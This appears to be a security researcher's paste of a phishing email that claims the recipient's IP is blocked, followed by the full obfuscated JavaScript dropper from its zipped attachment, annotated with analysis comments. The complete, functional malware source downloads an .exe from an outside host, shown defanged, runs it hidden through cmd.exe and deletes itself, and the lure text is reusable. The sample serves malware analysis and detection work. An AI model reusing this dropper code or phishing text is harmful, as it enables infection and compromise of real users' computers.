Neonprimetime

Malicious Email Javascript Zipped Attachment

May 31st, 2016
  1. Malicious Email
  2.  
  3. Subject: Internet Company Information Notice
  4.  
  5. Body:
  6. Your IP: XXXX (Port:YYY) has been blocked in our network. Please be acknowledge that you will get disconnected on ZZZZZZZZZ. To unblock your IP address and continue using our services, please see the document down below.
  7.  
  8. Thank you for your time and attention.
  9.  
  10. *******
  11. *******
  12. *******
  13.  
  14. function phdODK(BDxzUxp) {
          // Analysis note: string decoder for the sample's obfuscated constants.
          // BDxzUxp is read as consecutive 3-character decimal groups. Each group is
          // parsed to an integer, XORed with one character code of the key 'nlhkaaA'
          // (key index = group index modulo key length) and appended to the result
          // with String.fromCharCode. Returns the decoded string.
  15.     function LudXBg() {
  16.         return "ript.";
  17.     }
  18.     var VQZYECJk = LudXBg();
  19.  
  20.     function eLsQbm() {
  21.         return 'eva';
  22.     }
          // Builds new Function('e', 'return eval(e);') with the word "eval" split
          // across string pieces, then calls it on the argument.
  23.     function WsghAri(tYEReFjX) {
  24.         return new Function('e', 'return ' + eLsQbm() + 'l(e);')(tYEReFjX);
  25.     }
          // Environment gate: evaluates the assembled expression "typeof WScript.echo".
          // The key, the output accumulator and the scratch value are initialised only
          // when the result is "unknown"; otherwise zlqRuRIp stays undefined and the
          // .length read on line 31 throws, so nothing is ever decoded.
          // NOTE(review): presumably only satisfied under Windows Script Host - confirm.
  26.     if (WsghAri("typ" + "eof WSc" + VQZYECJk + "echo") == "unknown") {
  27.         var eolFu = [''][0]; // empty string: decoded output accumulator
  28.         var KglAhyte = 0;
  29.         var zlqRuRIp = 'nlhkaaA'; // repeating XOR key
  30.     }
  31.     var IomkXxz = zlqRuRIp.length;
  32.     var LKHf = 0;
  33.     var rmPSuo = "";
  34.     var yeLKv = BDxzUxp.length;
          // Walk the input three characters at a time (LKHf advances by 3 per pass).
  35.     while (LKHf < yeLKv - 2) {
  36.         var emltUT = [(0)][(0)]; // the number 0, written indirectly
  37.         var heFEDHq = LKHf + 1;
  38.         var owSGI = BDxzUxp.charAt(heFEDHq);
  39.         var ycWKAbv = BDxzUxp.charAt(LKHf + 2);
  40.         var wYoJj = BDxzUxp.charAt(LKHf);
  41.         rmPSuo = wYoJj + owSGI + ycWKAbv; // the full 3-character group
  42.         var EcqLhWq = BDxzUxp.charAt(LKHf);
  43.         var DHYSdRz = BDxzUxp.charAt(LKHf + 1);
  44.         var JqOlK102 = (DHYSdRz == 0); // loose ==: 2nd character compared with the number 0
  45.         if (EcqLhWq == emltUT) { // 1st character is '0': keep only the last two characters
  46.             var yTcN = LKHf + 1;
  47.             var lwhoMT = LKHf + 2;
  48.             var JkfmRe = BDxzUxp.charAt(lwhoMT);
  49.             rmPSuo = BDxzUxp.charAt(yTcN) + JkfmRe;
  50.         }
  51.         var UWEF = BDxzUxp.charAt(LKHf);
  52.         var JqOlK101 = (UWEF == 0);
  53.         if (JqOlK101 && JqOlK102) { // first two characters are '0': keep only the last one
  54.             var gjqTM = LKHf + 2;
  55.             rmPSuo = BDxzUxp.charAt(gjqTM);
  56.         }
              // parseInt is called without a radix; the branches above have already
              // dropped any leading zeros from the group.
              // NOTE(review): presumably to avoid an octal parse in older script engines - confirm.
  57.         KglAhyte = parseInt(rmPSuo);
  58.         var qUPdOk = LKHf / 3; // index of the current group
  59.         var YqZQveK = qUPdOk % IomkXxz; // position in the repeating key
  60.         var JqOlK = (zlqRuRIp + '').charCodeAt(YqZQveK);
  61.         KglAhyte = KglAhyte ^ JqOlK; // XOR the group value with the key character
  62.         var wrWKyga = String;
  63.         eolFu = eolFu + wrWKyga.fromCharCode(KglAhyte);
  64.         var SCINs = 3;
  65.         LKHf = LKHf + SCINs;
  66.     }
  67.     return eolFu;
  68. }
  // Analysis note: encoded string table. Each value is decoded at run time by
  // phdODK() (3-digit decimal groups XORed with the repeating key 'nlhkaaA').
  // Trailing comments give the decoded value; the URL is shown defanged.
  69. var rbyiT = "041009028056017004034007013004045014013037011030"; // "GetSpecialFolder"
  70. var DbBpuAUJ = "061015026002017021040000011070045008013036061021027031004012014012006013008021"; // "Scripting.FileSystemObject"
  71. var AOYPX = "041009028063004012049032013005014"; // "GetTempName"
  72. var jEbiJg = "058021024014"; // "Type"
  73. var gjRDBZlli = "028025006"; // "run"
  74. var nxkc = "006024028027091078110028003006015004013050064015007006078012036010005009068006000045002009026018078080111011020013"; // payload URL: hxxp://rondels[.]com/media/gallery/1.exe
  75. var NbFdixGWx = "060009027027014015050011046007015024"; // "ResponseBody"
  76. var pyKrdRdO = "010009004014021004007007000013"; // "deleteFile"
  77. var wTGh = "062003027002021008046000"; // "Position"
  78. var mhoG = "057063011025008017053064063000014013013"; // "WScript.Shell"
  79. var ekNXRV = "061015026002017021007027000004037000012036"; // "ScriptFullName"
  80. var zMIC = "045000007024004"; // "Close"
  81. var ZTQdy = "047040039047035079018026030013010012"; // "ADODB.Stream"
  82. var KoNFY = "001028013005"; // "open"
  83. var aELUR = "033028013005"; // "Open"
  84. var phRDNZLl = "061024009031020018"; // "Status"
  85. var hxl = "013001012069004025036078067011075"; // "cmd.exe /c "
  86. var SYZHLtZ = "057063011025008017053"; // "WScript"
  87. var oRFeGp = "035063048038045083111054033036035053053017"; // "MSXML2.XMLHTTP"
  88. var hIKjgS = "057030001031004"; // "Write"
  89. var xDYcEgLL = "061013030014053014007007000013"; // "SaveToFile"
  90. var wdECYMIC = "026021024014014007097057063011025008017053064060009031009"; // "typeof WScript.Path"
  91. var fNdU = "029009006015"; // "send"
  92. var ckbEb = "041041060"; // "GET"
  93. var PWP = "029024026002015006"; // "string"
  94. var wMPuUHf = phdODK(PWP); // "string"
  95. var jrykew = phdODK(wdECYMIC);
  96. var gKIjFTD = eval(jrykew); // result of eval("typeof WScript.Path")
  97. var CZpfNHnu = phdODK(SYZHLtZ);
  98. var ZkyU = eval(CZpfNHnu); // eval("WScript"): reference to the script host object
  99.  
  100. function COrh() {
           // Analysis note: download-and-execute routine. Every COM class, method and
           // property name is produced by phdODK(); decoded values are given in the
           // trailing comments. Sequence: synchronous HTTP GET of the payload URL, body
           // written to a temp-named file in the temporary folder, file launched through
           // "cmd.exe /c", then the script deletes itself.
           // Observable behaviour for detection: a script-host process issuing the HTTP
           // request, a new file in the temp folder, a cmd.exe child started on that
           // file, and removal of the originating .js file.
           // The later blocks depend on var hoisting: if the first condition is false,
           // jXlbB is undefined and line 113 throws (swallowed by the caller's catch).
  101.     if (gKIjFTD == wMPuUHf) { // typeof WScript.Path == "string"
  102.         var DpbVOlZk = phdODK(oRFeGp); // "MSXML2.XMLHTTP"
  103.         var fVBpAvSx = ZkyU; // the WScript host object
  104.         var RMeFurZy = phdODK(nxkc); // payload URL
  105.         var jXlbB = new ActiveXObject(DpbVOlZk);
  106.         var cwoowz = phdODK(ZTQdy); // "ADODB.Stream"
  107.         var CuJR = phdODK(ckbEb); // "GET"
  108.         jXlbB[phdODK(KoNFY)](CuJR, RMeFurZy, 0); // .open("GET", url, 0): third argument 0 = not asynchronous
  109.         jXlbB[phdODK(fNdU)](); // .send()
  110.         var fKsdBfhh = phdODK(DbBpuAUJ); // "Scripting.FileSystemObject"
  111.         var yhYPrW = new ActiveXObject(fKsdBfhh);
  112.     }
  113.     if (jXlbB[phdODK(phRDNZLl)] == 200) { // .Status == 200: only proceed on a successful response
  114.         var sxBu = new ActiveXObject(cwoowz); // ADODB.Stream used to write the response bytes
  115.         var QIrpQTKA = phdODK(AOYPX); // "GetTempName"
  116.         var GGvZJWe = '\\' + yhYPrW[QIrpQTKA](); // "\" + name returned by GetTempName()
  117.         var dEqkDgBz = yhYPrW[phdODK(rbyiT)](2) + GGvZJWe; // GetSpecialFolder(2) (temporary folder) + "\" + temp name
  118.         sxBu[phdODK(aELUR)](); // .Open()
  119.         var UXIo = phdODK(mhoG); // "WScript.Shell"
  120.         sxBu[phdODK(jEbiJg)] = 1; // .Type = 1 (binary stream)
  121.         var yXiONczo = new ActiveXObject(UXIo);
  122.         var gUifEek = jXlbB[phdODK(NbFdixGWx)]; // .ResponseBody
  123.         sxBu[phdODK(hIKjgS)](gUifEek); // .Write(response body)
  124.         sxBu[phdODK(wTGh)] = 0; // .Position = 0
  125.         sxBu[phdODK(xDYcEgLL)](dEqkDgBz); // .SaveToFile(path)
  126.         sxBu[phdODK(zMIC)](); // .Close()
  127.         var iOMtsT = phdODK(hxl) + dEqkDgBz; // "cmd.exe /c " + path of the saved file
  128.         yXiONczo[phdODK(gjRDBZlli)](iOMtsT, 0); // WScript.Shell .run(command, 0): window style 0 = hidden
  129.     }
  130.     var RaPPJeGi = fVBpAvSx[phdODK(ekNXRV)]; // WScript.ScriptFullName: path of this script
  131.     yhYPrW[phdODK(pyKrdRdO)](RaPPJeGi); // FileSystemObject .deleteFile(): the script removes itself
  132. }
  // Analysis note: entry point. COrh() runs only when the evaluated expression
  // (decoded as "typeof WScript.Path") equals the decoded string "string".
  // The empty catch swallows every exception, so a failed run shows no error.
  133. if (gKIjFTD == wMPuUHf) {
  134.     try {
  135.         COrh();
  136.     } catch (e) {}
  137. }
  138.  
  139. *******
  140. *******
  141. *******
  142. More from @neonprimetime security
  143.  
  144. http://pastebin.com/u/Neonprimetime
  145. https://www.virustotal.com/en/user/neonprimetime/
  146. https://twitter.com/neonprimetime
  147. https://www.reddit.com/user/neonprimetime